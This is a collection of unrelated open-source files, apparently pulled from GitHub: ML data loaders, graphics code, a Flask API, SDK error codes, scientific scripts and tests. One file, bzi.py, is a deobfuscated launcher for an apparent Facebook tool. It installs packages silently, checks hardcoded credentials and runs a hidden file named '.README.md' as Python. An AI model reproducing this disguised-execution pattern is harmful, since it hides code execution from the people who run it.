manifest_filepath: relative path from dataset folder to manifest json as described above.
labels: String containing all the possible characters to map to
featurizer: Initialized featurizer class that converts paths of audio to feature tensors
max_duration: If audio exceeds this length, do not include in dataset
min_duration: If audio is less than this length, do not include in dataset
pad_to_max: if specified input sequences into dnn model will be padded to max_duration
blank_index: blank index for ctc loss / decoder
max_utts: Limit number of utterances
normalize: whether to normalize transcript text
sort_by_duration: whether or not to sort sequences by increasing duration
trim: if specified trims leading and trailing silence from an audio signal.
speed_perturbation: specify if using data contains speed perburbation
"""
m_paths = [manifest_filepath]
self.manifest = Manifest(dataset_dir, m_paths, labels, blank_index, pad_to_max=pad_to_max,
max_duration=max_duration,
sort_by_duration=sort_by_duration,
min_duration=min_duration, max_utts=max_utts,
normalize=normalize, speed_perturbation=speed_perturbation)
self.featurizer = featurizer
self.blank_index = blank_index
self.trim = trim
print(
"Dataset loaded with {0:.2f} hours. Filtered {1:.2f} hours.".format(
self.manifest.duration / 3600,
self.manifest.filtered_duration / 3600))
def __getitem__(self, index):
sample = self.manifest[index]
rn_indx = np.random.randint(len(sample['audio_filepath']))
duration = sample['audio_duration'][rn_indx] if 'audio_duration' in sample else 0
offset = sample['offset'] if 'offset' in sample else 0
features = self.featurizer.process(sample['audio_filepath'][rn_indx],
offset=offset, duration=duration,
trim=self.trim)
AudioSample = namedtuple('AudioSample', ['waveform',
'transcript'])
return AudioSample(features,
torch.LongTensor(sample["transcript"]))
def __len__(self):
return len(self.manifest)
|
pi3d/util/PostProcess.py | helgeerbe/pi3d | 177 | 11188378 | import ctypes
from pi3d.constants import (opengles, GL_SCISSOR_TEST, GLint, GLsizei, GL_RGBA,
GLubyte, GL_UNSIGNED_BYTE)
from pi3d.Shader import Shader
from pi3d.Camera import Camera
from pi3d.shape.LodSprite import LodSprite
from pi3d.util.OffScreenTexture import OffScreenTexture
class PostProcess(OffScreenTexture):
"""For creating a an offscreen texture that can be redrawn using shaders
as required by the developer"""
def __init__(self, shader="post_base", mipmap=False, add_tex=None,
scale=1.0, camera=None, divide=1):
""" calls Texture.__init__ but doesn't need to set file name as
texture generated from the framebuffer. Keyword Arguments:
*shader*
to use when drawing sprite, defaults to post_base, a simple
3x3 convolution that does basic edge detection. Can be copied to
project directory and modified as required.
*mipmap*
can be set to True with slight cost to speed, or use fxaa shader
*add_tex*
list of textures. If additional textures can be used by the shader
then they can be added here.
*scale*
will only render this proportion of the full screen which will
then be mapped to the full uv of the Sprite. The camera object
passed (below) will need to have the same scale set to avoid
perspective distortion
*camera*
the camera to use for rendering to the offscreen texture
*divide*
allow the sprite to be created with intermediate vertices to allow
interesting vertex shader effects
"""
super(PostProcess, self).__init__("postprocess")
self.scale = scale
# load shader
if type(shader) == Shader:
self.shader = shader
else:
self.shader = Shader.create(shader)
if camera is None:
self.viewcam = Camera.instance() # in case this is prior to one being created
else:
self.viewcam = camera
self.camera = Camera(is_3d=False)
self.sprite = LodSprite(camera=self.camera, z=20.0, w=self.ix, h=self.iy, n=divide)
self.sprite.set_2d_size(w=self.ix, h=self.iy)
self.tex_list = [self.color, self.depth] # TODO check if this self reference causes graphics memory leaks
if add_tex:
self.tex_list.extend(add_tex)
self.sprite.set_draw_details(self.shader, self.tex_list, 0.0, 0.0)
for b in self.sprite.buf:
b.unib[6] = self.scale # ufact
b.unib[7] = self.scale # vfact
b.unib[9] = (1.0 - self.scale) * 0.5 # uoffset
b.unib[10] = (1.0 - self.scale) * 0.5 # voffset
self.blend = True
self.mipmap = mipmap
def start_capture(self, clear=True):
""" after calling this method all object.draw()s will rendered
to this texture and not appear on the display. Large objects
will obviously take a while to draw and re-draw
"""
super(PostProcess, self)._start(clear=clear)
from pi3d.Display import Display
xx = int(Display.INSTANCE.width / 2.0 * (1.0 - self.scale)) - 1
yy = int(Display.INSTANCE.height / 2.0 * (1.0 - self.scale)) - 1
ww = int(Display.INSTANCE.width * self.scale) + 2
hh = int(Display.INSTANCE.height * self.scale) + 2
opengles.glEnable(GL_SCISSOR_TEST)
opengles.glScissor(GLint(xx), GLint(yy), GLsizei(ww), GLsizei(hh))
def end_capture(self):
""" stop capturing to texture and resume normal rendering to default
"""
super(PostProcess, self)._end()
opengles.glDisable(GL_SCISSOR_TEST)
def draw(self, unif_vals=None):
""" draw the shape using the saved texture
Keyword Argument:
*unif_vals*
dictionay object i.e. {a:unif[a], b:unif[b], c:unif[c]} where a,b,c
are subscripts of the unif array in Shape available for user
custom space i.e. unif[48]...unif[59] corresponding with the vec3
uniform variables unif[16][0] to unif[19][2]
NB the values must be three value tuples or 1D arrays
"""
if unif_vals:
for i in unif_vals:
self.sprite.unif[i] = unif_vals[i]
self.sprite.draw()
|
routes/api.py | RobbiNespu/forget | 157 | 11188412 | <gh_stars>100-1000
from app import app, db, imgproxy
from libforget.auth import require_auth_api, get_viewer
from flask import jsonify, redirect, make_response, request, Response
from model import Account
import libforget.settings
import libforget.json
import random
@app.route('/api/health_check') # deprecated 2021-03-12
@app.route('/api/status_check')
def api_status_check():
try:
db.session.execute('SELECT 1')
except Exception:
return ('PostgreSQL bad', 500)
try:
imgproxy.redis.set('forget-status-check', 'howdy', ex=5)
except Exception:
return ('Redis bad', 500)
return 'OK'
@app.route('/api/settings', methods=('PUT',))
@require_auth_api
def api_settings_put():
viewer = get_viewer()
data = request.json
updated = dict()
for key in libforget.settings.attrs:
if key in data:
if (
isinstance(getattr(viewer, key), bool) and
isinstance(data[key], str)):
data[key] = data[key] == 'true'
setattr(viewer, key, data[key])
updated[key] = data[key]
db.session.commit()
return jsonify(status='success', updated=updated)
@app.route('/api/viewer')
@require_auth_api
def api_viewer():
viewer = get_viewer()
resp = make_response(libforget.json.account(viewer))
resp.headers.set('content-type', 'application/json')
return resp
@app.route('/api/reason', methods={'DELETE'})
@require_auth_api
def delete_reason():
get_viewer().reason = None
db.session.commit()
return jsonify(status='success')
@app.route('/api/badge/users')
def users_badge():
count = (
Account.query.filter(Account.policy_enabled)
.filter(~Account.dormant)
.count()
)
return redirect(
"https://img.shields.io/badge/active%20users-{}-blue.svg"
.format(count))
@app.route('/api/known_instances', methods=('GET', 'DELETE'))
def known_instances():
if request.method == 'GET':
known = request.cookies.get('forget_known_instances', '')
if not known:
return Response('[]', 404, mimetype='application/json')
# pad to avoid oracle attacks
for _ in range(random.randint(0, 1000)):
known += random.choice((' ', '\t', '\n'))
return Response(known, mimetype='application/json')
elif request.method == 'DELETE':
resp = Response('', 204)
resp.set_cookie('forget_known_instances', '', max_age=0)
return resp
|
tencentcloud/ams/v20201229/errorcodes.py | PlasticMem/tencentcloud-sdk-python | 465 | 11188465 | <reponame>PlasticMem/tencentcloud-sdk-python
# -*- coding: utf8 -*-
# Copyright (c) 2017-2021 THL A29 Limited, a Tencent company. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# DryRun 操作,代表请求将会是成功的,只是多传了 DryRun 参数。
DRYRUNOPERATION = 'DryRunOperation'
# 操作失败。
FAILEDOPERATION = 'FailedOperation'
# 内部错误。
INTERNALERROR = 'InternalError'
# InternalError.InternalError
INTERNALERROR_INTERNALERROR = 'InternalError.InternalError'
# 参数错误。
INVALIDPARAMETER = 'InvalidParameter'
# InvalidParameter.ImageSizeTooSmall
INVALIDPARAMETER_IMAGESIZETOOSMALL = 'InvalidParameter.ImageSizeTooSmall'
# InvalidParameter.InvalidImageContent
INVALIDPARAMETER_INVALIDIMAGECONTENT = 'InvalidParameter.InvalidImageContent'
# InvalidParameter.ParameterError
INVALIDPARAMETER_PARAMETERERROR = 'InvalidParameter.ParameterError'
# 参数取值错误。
INVALIDPARAMETERVALUE = 'InvalidParameterValue'
# InvalidParameterValue.EmptyImageContent
INVALIDPARAMETERVALUE_EMPTYIMAGECONTENT = 'InvalidParameterValue.EmptyImageContent'
# InvalidParameterValue.ImageSizeTooSmall
INVALIDPARAMETERVALUE_IMAGESIZETOOSMALL = 'InvalidParameterValue.ImageSizeTooSmall'
# InvalidParameterValue.InvalidContent
INVALIDPARAMETERVALUE_INVALIDCONTENT = 'InvalidParameterValue.InvalidContent'
# InvalidParameterValue.InvalidDataId
INVALIDPARAMETERVALUE_INVALIDDATAID = 'InvalidParameterValue.InvalidDataId'
# InvalidParameterValue.InvalidFileContentSize
INVALIDPARAMETERVALUE_INVALIDFILECONTENTSIZE = 'InvalidParameterValue.InvalidFileContentSize'
# InvalidParameterValue.InvalidImageContent
INVALIDPARAMETERVALUE_INVALIDIMAGECONTENT = 'InvalidParameterValue.InvalidImageContent'
# InvalidParameterValue.InvalidParameter
INVALIDPARAMETERVALUE_INVALIDPARAMETER = 'InvalidParameterValue.InvalidParameter'
# 超过配额限制。
LIMITEXCEEDED = 'LimitExceeded'
# 缺少参数错误。
MISSINGPARAMETER = 'MissingParameter'
# 操作被拒绝。
OPERATIONDENIED = 'OperationDenied'
# 请求的次数超过了频率限制。
REQUESTLIMITEXCEEDED = 'RequestLimitExceeded'
# 资源被占用。
RESOURCEINUSE = 'ResourceInUse'
# 资源不足。
RESOURCEINSUFFICIENT = 'ResourceInsufficient'
# 资源不存在。
RESOURCENOTFOUND = 'ResourceNotFound'
# 资源不可用。
RESOURCEUNAVAILABLE = 'ResourceUnavailable'
# ResourceUnavailable.InvalidImageContent
RESOURCEUNAVAILABLE_INVALIDIMAGECONTENT = 'ResourceUnavailable.InvalidImageContent'
# 资源售罄。
RESOURCESSOLDOUT = 'ResourcesSoldOut'
# 未授权操作。
UNAUTHORIZEDOPERATION = 'UnauthorizedOperation'
# 未知参数错误。
UNKNOWNPARAMETER = 'UnknownParameter'
# 操作不支持。
UNSUPPORTEDOPERATION = 'UnsupportedOperation'
|
homeassistant/components/motioneye/sensor.py | MrDelik/core | 30,023 | 11188473 | <reponame>MrDelik/core<gh_stars>1000+
"""Sensor platform for motionEye."""
from __future__ import annotations
import logging
from types import MappingProxyType
from typing import Any
from motioneye_client.client import MotionEyeClient
from motioneye_client.const import KEY_ACTIONS, KEY_NAME
from homeassistant.components.sensor import SensorEntity, SensorEntityDescription
from homeassistant.config_entries import ConfigEntry
from homeassistant.core import HomeAssistant, callback
from homeassistant.helpers.entity_platform import AddEntitiesCallback
from homeassistant.helpers.typing import StateType
from homeassistant.helpers.update_coordinator import DataUpdateCoordinator
from . import MotionEyeEntity, get_camera_from_cameras, listen_for_new_cameras
from .const import CONF_CLIENT, CONF_COORDINATOR, DOMAIN, TYPE_MOTIONEYE_ACTION_SENSOR
_LOGGER = logging.getLogger(__name__)
async def async_setup_entry(
hass: HomeAssistant, entry: ConfigEntry, async_add_entities: AddEntitiesCallback
) -> None:
"""Set up motionEye from a config entry."""
entry_data = hass.data[DOMAIN][entry.entry_id]
@callback
def camera_add(camera: dict[str, Any]) -> None:
"""Add a new motionEye camera."""
async_add_entities(
[
MotionEyeActionSensor(
entry.entry_id,
camera,
entry_data[CONF_CLIENT],
entry_data[CONF_COORDINATOR],
entry.options,
)
]
)
listen_for_new_cameras(hass, entry, camera_add)
class MotionEyeActionSensor(MotionEyeEntity, SensorEntity):
"""motionEye action sensor camera."""
def __init__(
self,
config_entry_id: str,
camera: dict[str, Any],
client: MotionEyeClient,
coordinator: DataUpdateCoordinator,
options: MappingProxyType[str, str],
) -> None:
"""Initialize an action sensor."""
super().__init__(
config_entry_id,
TYPE_MOTIONEYE_ACTION_SENSOR,
camera,
client,
coordinator,
options,
SensorEntityDescription(
key=TYPE_MOTIONEYE_ACTION_SENSOR, entity_registry_enabled_default=False
),
)
@property
def name(self) -> str:
"""Return the name of the sensor."""
camera_prepend = f"{self._camera[KEY_NAME]} " if self._camera else ""
return f"{camera_prepend}Actions"
@property
def native_value(self) -> StateType:
"""Return the value reported by the sensor."""
return len(self._camera.get(KEY_ACTIONS, [])) if self._camera else 0
@property
def extra_state_attributes(self) -> dict[str, Any] | None:
"""Add actions as attribute."""
if actions := (self._camera.get(KEY_ACTIONS) if self._camera else None):
return {KEY_ACTIONS: actions}
return None
@callback
def _handle_coordinator_update(self) -> None:
"""Handle updated data from the coordinator."""
self._camera = get_camera_from_cameras(self._camera_id, self.coordinator.data)
super()._handle_coordinator_update()
|
bzi/dec/bzi.py | shyamjangid07/Reverse-Engineering | 337 | 11188485 | # Deobfuscated BY HTR-TECH | <NAME>
# Github : https://github.com/htr-tech
# Instagram : https://www.instagram.com/tahmid.rayat
# Facebook : https://fb.com/tahmid.rayat.oficial
# Messenger : https://m.me/tahmid.rayat.oficial
try:
import os,sys,time,datetime,random,hashlib,re,threading,json,urllib,cookielib,getpass,mechanize,requests,bzin
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
except ImportError:
os.system('pip2 install requests')
os.system('pip2 install mechanize')
os.system("pip2 install bzin")
time.sleep(1)
os.system('python2 bzi.py')
os.system("clear")
##### LOGO #####
logo='''
______ _______ _________
( ___ \ / ___ )\__ __/
| ( ) )\/ ) | ) (
| (__/ / / ) | |
| __ ( / / | |
| ( \ \ / / | |
| )___) ) / (_/\___) (___
|/ \___/ (_______/\_______/
--------------------------------------------------
Auther : Binyamin
GitHub : https://github.com/binyamin-binni
YouTube : Trick Proof
Blogspot : https://trickproof.blogspot.com
--------------------------------------------------
'''
cusr = "binyamin"
cpwd = "bzi"
def u():
os.system("clear")
print(logo)
usr=raw_input(" TOOL USERNAME : ")
if usr == cusr:
p()
else:
os.system("clear")
print(logo)
print(" TOOL USERNAME : "+usr+" (wrong)")
time.sleep(1)
os.system('xdg-open https://trickproof.blogspot.com/2020/04/new-termux-commands-for-fb.html')
u()
def p():
os.system("clear")
print(logo)
print(" TOOL USERNAME : binyamin (correct)")
pwd=raw_input(" TOOL PASSWORD : ")
if pwd == cpwd:
z()
else:
os.system("clear")
print(logo)
print(" TOOL USERNAME : binyamin (correct)")
print(" TOOL PASSWORD : "+pwd+" (wrong)")
time.sleep(1)
os.system('xdg-open https://trickproof.blogspot.com/2020/04/new-termux-commands-for-fb.html')
p()
def z():
os.system("clear")
print(logo)
print(" TOOL USERNAME : binyamin (correct)")
print(" TOOL PASSWORD : <PASSWORD> (correct)")
time.sleep(1)
os.system("python2 .README.md")
if __name__=="__main__":
u()
|
socket__tcp__examples/hello_world__with_RSA_AES__commands_in_JSON__client=public_and_server=private/utils.py | DazEB2/SimplePyScripts | 117 | 11188518 | <reponame>DazEB2/SimplePyScripts
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = 'ipetrash'
import enum
class CommandEnum(enum.Enum):
CURRENT_DATETIME = enum.auto()
CURRENT_TIMESTAMP = enum.auto()
RANDOM = enum.auto()
GUID = enum.auto()
FILE_NAME_PUBLIC_KEY = 'keys/public.pem'
FILE_NAME_PRIVATE_KEY = 'keys/private.pem'
if __name__ == '__main__':
print(CommandEnum)
|
platypush/backend/http/app/routes/plugins/qrcode/__init__.py | RichardChiang/platypush | 228 | 11188536 | <gh_stars>100-1000
import base64
from flask import abort, request, Blueprint, Response
from platypush.backend.http.app import template_folder
from platypush.context import get_plugin
qrcode = Blueprint('qrcode', __name__, template_folder=template_folder)
# Declare routes list
__routes__ = [
qrcode,
]
@qrcode.route('/qrcode', methods=['GET'])
def generate_code():
"""
This route can be used to generate a QR code given a ``content`` parameter.
"""
from platypush.plugins.qrcode import QrcodePlugin
content = request.args.get('content')
if not content:
abort(400, 'Expected content parmeter')
plugin: QrcodePlugin = get_plugin('qrcode')
response = plugin.generate(content, format='png').output
data = base64.decodebytes(response['data'].encode())
return Response(data, mimetype='image/png')
# vim:sw=4:ts=4:et:
|
applications/pytorch/bert/tests/accuracy_test.py | payoto/graphcore_examples | 260 | 11188569 | <reponame>payoto/graphcore_examples
# Copyright (c) 2021 Graphcore Ltd. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import torch
from modeling import accuracy, accuracy_masked
def test_accuracy():
pred = torch.tensor(
[[1.0, 2.0, 5.0],
[5.0, 2.0, 1.0],
[2.0, 5.0, 1.0],
[2.0, 1.0, 5.0]]
)
# test all right = 100% accuracy
labels = torch.tensor([2, 0, 1, 2])
assert accuracy(pred, labels) == 1.0
# test all wrong = 0% accuracy
labels = torch.tensor([0, 1, 0, 0])
assert accuracy(pred, labels) == 0.0
# test 50% right
labels = torch.tensor([2, 1, 1, 0])
assert accuracy(pred, labels) == 0.5
def test_accuracy_masked():
ignore_token = -100
# prediction tensor dimensions:
# [bs, seq_len, vocab_size]
pred = torch.tensor(
[
[[1.0, 2.0, 5.0],
[5.0, 2.0, 1.0]],
[[2.0, 5.0, 1.0],
[2.0, 1.0, 5.0]]
]
)
# label tensor dimensions:
# [bs, seq_len]
labels = torch.tensor(
[[2, 0], [1, 2]]
)
# No mask with 100% correct
assert accuracy_masked(pred, labels, ignore_token) == 1.0
# No mask with 0% correct
labels = torch.tensor(
[[1, 2], [0, 1]]
)
assert accuracy_masked(pred, labels, ignore_token) == 0.0
# with 1 mask token per sequence with 100% correct
labels = torch.tensor(
[[ignore_token, 0], [1, ignore_token]]
)
assert accuracy_masked(pred, labels, ignore_token) == 1.0
# with 1 mask token per sequence with 0% correct
labels = torch.tensor(
[[ignore_token, 2], [0, ignore_token]]
)
assert accuracy_masked(pred, labels, ignore_token) == 0.0
# with 1 mask token per sequence with 50% correct
labels = torch.tensor(
[[ignore_token, 2], [1, ignore_token]]
)
assert accuracy_masked(pred, labels, ignore_token) == 0.5
# with only mask tokens should be nan
labels = torch.tensor(
[[ignore_token, ignore_token], [ignore_token, ignore_token]]
)
assert accuracy_masked(pred, labels, ignore_token).isnan()
|
Algebraic-Diagrammatic-Construction/IP_EA_ADC2.py | andyj10224/psi4numpy | 214 | 11188611 | <reponame>andyj10224/psi4numpy
'''
A reference implementation of ADC(2) for the calculation of ionization
potentials and electron affinities for a restricted Hartree-Fock
reference. A spin orbital formulation is used, as it simplifies the
equations.
References:
<NAME>, <NAME>, <NAME> and <NAME>, J. Chem. Phys., 150, 064108 (2019).
'''
__authors__ = '<NAME>'
__credits__ = ['<NAME>']
__copyright__ = '(c) 2014-2020, The Psi4NumPy Developers'
__license__ = 'BSD-3-Clause'
__date__ = '2018-03-01'
import time
import numpy as np
import psi4
import functools
from adc_helper import davidson
einsum = functools.partial(np.einsum, optimize=True)
# Settings
n_states = 5
tol = 1e-8
# Set the memory and output file
psi4.set_memory('2 GB')
psi4.core.set_output_file('output.dat', False)
# Set molecule and basis
mol = psi4.geometry('''
O
H 1 1.1
H 1 1.1 2 104
symmetry c1
''')
psi4.set_options({
'basis': '6-31g',
'scf_type': 'pk',
'mp2_type': 'conv',
'e_convergence': 1e-10,
'd_convergence': 1e-10,
'freeze_core': 'false'
})
# Perform SCF
print('\nPerforming SCF...')
e_scf, wfn = psi4.energy('SCF', return_wfn=True)
mints = psi4.core.MintsHelper(wfn.basisset())
# Get data from the wavefunction
nocc = wfn.doccpi()[0]
nmo = wfn.nmo()
e_mo = wfn.epsilon_a().np
c_mo = wfn.Ca()
# Get the antisymmetrized spin-orbital integrals (physicist notation)
print('Building integrals...')
eri = mints.mo_spin_eri(c_mo, c_mo).np
# Expand to spin orbitals
nso = nmo * 2
nocc = nocc * 2
nvir = nso - nocc
e_mo = np.repeat(e_mo, 2)
# Build some slices
o = slice(None, nocc)
v = slice(nocc, None)
# Calculate intermediates
e_ia = e_mo[o, None] - e_mo[None, v]
e_ija = e_mo[o, None, None] + e_ia[None]
e_iab = e_ia[:, :, None] - e_mo[None, None, v]
e_ijab = e_ija[:, :, :, None] - e_mo[None, None, None, v]
t2 = eri[o, o, v, v] / e_ijab
# Print the MP2 energy
e_mp2 = einsum('ijab,ijab->', t2, eri[o, o, v, v]) * 0.25
print('RHF total energy: %16.10f' % e_scf)
print('MP2 correlation energy: %16.10f' % e_mp2)
print('MP2 total energy: %16.10f' % (e_scf + e_mp2))
psi4.compare_values(psi4.energy('mp2'), e_mp2 + e_scf, 6, 'MP2 Energy')
# Construct the singles-singles (1h-1h) space (eq A5)
h_hh = np.diag(e_mo[o])
h_hh += einsum('ikab,jkab->ij', t2, eri[o, o, v, v]) * 0.25
h_hh += einsum('jkab,ikab->ij', t2, eri[o, o, v, v]) * 0.25
# Construct the single-singles (1p-1p) space (adapted from eq A5)
h_pp = np.diag(e_mo[v])
h_pp -= einsum('ijac,ijbc->ab', t2, eri[o, o, v, v]) * 0.25
h_pp -= einsum('ijbc,ijac->ab', t2, eri[o, o, v, v]) * 0.25
# Define the operation representing the dot-product of the IP-ADC(2) matrix
# with an arbitrary state vector (eq A3 & A4)
def ip_matvec(y):
y = np.array(y, order='C')
r = np.zeros_like(y)
yi = y[:nocc]
ri = r[:nocc]
yija = y[nocc:].reshape(nocc, nocc, nvir)
rija = r[nocc:].reshape(nocc, nocc, nvir)
ri += np.dot(h_hh, yi)
ri += einsum('ijak,ija->k', eri[o, o, v, o], yija) * np.sqrt(0.5)
rija += einsum('ijak,k->ija', eri[o, o, v, o], yi) * np.sqrt(0.5)
rija += einsum('ija,ija->ija', e_ija, yija)
return r
# Define the operation representing the dot-product of the EA-ADC(2) matrix
# with an arbitrary state vector (adapted from eq A3 & A4)
def ea_matvec(y):
y = np.array(y, order='C')
r = np.zeros_like(y)
ya = y[:nvir]
ra = r[:nvir]
yiab = y[nvir:].reshape(nocc, nvir, nvir)
riab = r[nvir:].reshape(nocc, nvir, nvir)
ra += np.dot(h_pp, ya)
ra += einsum('abic,iab->c', eri[v, v, o, v], yiab) * np.sqrt(0.5)
riab += einsum('abic,c->iab', eri[v, v, o, v], ya) * np.sqrt(0.5)
riab += einsum('iab,iab->iab', -e_iab, yiab)
return r
# Compute the diagonal of the IP-ADC(2) matrix to use as a preconditioner
# for the Davidson algorithm, and to generate the guess vectors
diag = np.concatenate([np.diag(h_hh), e_ija.ravel()])
arg = np.argsort(np.absolute(diag))
guess = np.eye(diag.size)[:, arg[:n_states]]
# Compute the IPs
e_ip, v_ip = davidson(ip_matvec, guess, diag, tol=tol)
# Print the IPs - each should be doubly degenerate
print('\n%2s %16s %16s' % ('#', 'IP (Ha)', 'IP (eV)'))
for i in range(n_states):
print('%2d %16.8f %16.8f' % (i, -e_ip[i], -e_ip[i] * 27.21139664))
print()
# Compute the diagonal of the EA-ADC(2) matrix to use as a preconditioner
# for the Davidson algorithm, and to generate the guess vectors
diag = np.concatenate([np.diag(h_pp), -e_iab.ravel()])
arg = np.argsort(np.absolute(diag))
guess = np.eye(diag.size)[:, arg[:n_states]]
# Compute the EAs
e_ea, v_ea = davidson(ea_matvec, guess, diag, tol=tol)
# Print the states - each should be doubly degenerate
print('\n%2s %16s %16s' % ('#', 'EA (Ha)', 'EA (eV)'))
for i in range(n_states):
print('%2d %16.8f %16.8f' % (i, e_ea[i], e_ea[i] * 27.21139664))
|
pyclustering/cluster/tests/unit/ut_bsas.py | JosephChataignon/pyclustering | 1,013 | 11188651 | """!
@brief Unit-tests for BSAS algorithm.
@authors <NAME> (<EMAIL>)
@date 2014-2020
@copyright BSD-3-Clause
"""
import unittest
# Generate images without having a window appear.
import matplotlib
matplotlib.use('Agg')
from pyclustering.cluster.tests.bsas_templates import bsas_test_template
from pyclustering.cluster.bsas import bsas
from pyclustering.utils.metric import type_metric, distance_metric
from pyclustering.samples.definitions import SIMPLE_SAMPLES
class bsas_unit_test(unittest.TestCase):
def testClusteringSampleSimple1(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0, [5, 5], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 10, 1.0, [5, 5], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 10.0, [10], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 1, 1.0, [10], False)
def testClusteringSampleSimple1Euclidean(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0, [5, 5], False, metric=distance_metric(type_metric.EUCLIDEAN))
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 10.0, [10], False, metric=distance_metric(type_metric.EUCLIDEAN))
def testClusteringSampleSimple1EuclideanSquare(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0, [5, 5], False, metric=distance_metric(type_metric.EUCLIDEAN_SQUARE))
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 10.0, [5, 5], False, metric=distance_metric(type_metric.EUCLIDEAN_SQUARE))
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 100.0, [10], False, metric=distance_metric(type_metric.EUCLIDEAN_SQUARE))
def testClusteringSampleSimple1Manhattan(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0, [5, 5], False, metric=distance_metric(type_metric.MANHATTAN))
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 10.0, [10], False, metric=distance_metric(type_metric.MANHATTAN))
def testClusteringSampleSimple1Chebyshev(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0, [5, 5], False, metric=distance_metric(type_metric.CHEBYSHEV))
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 10.0, [10], False, metric=distance_metric(type_metric.CHEBYSHEV))
def testClusteringSampleSimple2(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 1.0, [5, 8, 10], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE2, 3, 10.0, [23], False)
def testClusteringSampleSimple3(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, 1.0, [2, 8, 20, 30], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, 2.0, [8, 10, 12, 30], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE3, 4, 10.0, [60], False)
def testOneDimentionalPoints1(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 1.0, [10, 10], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 10.0, [20], False)
def testOneDimentionalPoints2(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, 1.0, [10, 20], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 2, 10.0, [30], False)
def testThreeDimentionalPoints(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 2, 1.0, [10, 10], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 2, 10.0, [20], False)
def testTheSamePoints1(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 3, 1.0, [5, 5, 5], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 30, 1.0, [5, 5, 5], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 3, 10.0, [15], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE12, 1, 1.0, [15], False)
def testTheSamePoints2(self):
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 3, 1.0, [10, 20], False)
bsas_test_template.clustering(SIMPLE_SAMPLES.SAMPLE_SIMPLE9, 3, 10.0, [30], False)
def testVisulizeNoFailure(self):
bsas_test_template.visualizing(SIMPLE_SAMPLES.SAMPLE_SIMPLE1, 2, 1.0, False)
bsas_test_template.visualizing(SIMPLE_SAMPLES.SAMPLE_SIMPLE7, 2, 1.0, False)
bsas_test_template.visualizing(SIMPLE_SAMPLES.SAMPLE_SIMPLE11, 2, 1.0, False)
def test_incorrect_data(self):
self.assertRaises(ValueError, bsas, [], 1, 1.0)
def test_incorrect_amount_clusters(self):
self.assertRaises(ValueError, bsas, [[0], [1], [2]], 0, 1.0)
def test_incorrect_threshold_dissimilarity(self):
self.assertRaises(ValueError, bsas, [[0], [1], [2]], 1, -1.0)
|
src/users/urls.py | denkasyanov/education-backend | 151 | 11188690 | from django.urls import path
from users.api.views import SelfView
urlpatterns = [
path('me/', SelfView.as_view()),
]
|
examples/wordfreq.py | ShadowJonathan/txredisapi | 104 | 11188708 | <filename>examples/wordfreq.py
#!/usr/bin/env python
# coding: utf-8
from __future__ import print_function
import sys
import txredisapi as redis
from twisted.internet import defer
from twisted.internet import reactor
def wordfreq(file):
try:
f = open(file, 'r')
words = f.read()
f.close()
except Exception as e:
print("Exception: %s" % e)
return None
wf = {}
wlist = words.split()
for b in wlist:
a = b.lower()
if a in wf:
wf[a] = wf[a] + 1
else:
wf[a] = 1
return len(wf), wf
@defer.inlineCallbacks
def main(wordlist):
db = yield redis.ShardedConnection(("localhost:6379", "localhost:6380"))
for k in wordlist:
yield db.set(k, 1)
reactor.stop()
if __name__ == '__main__':
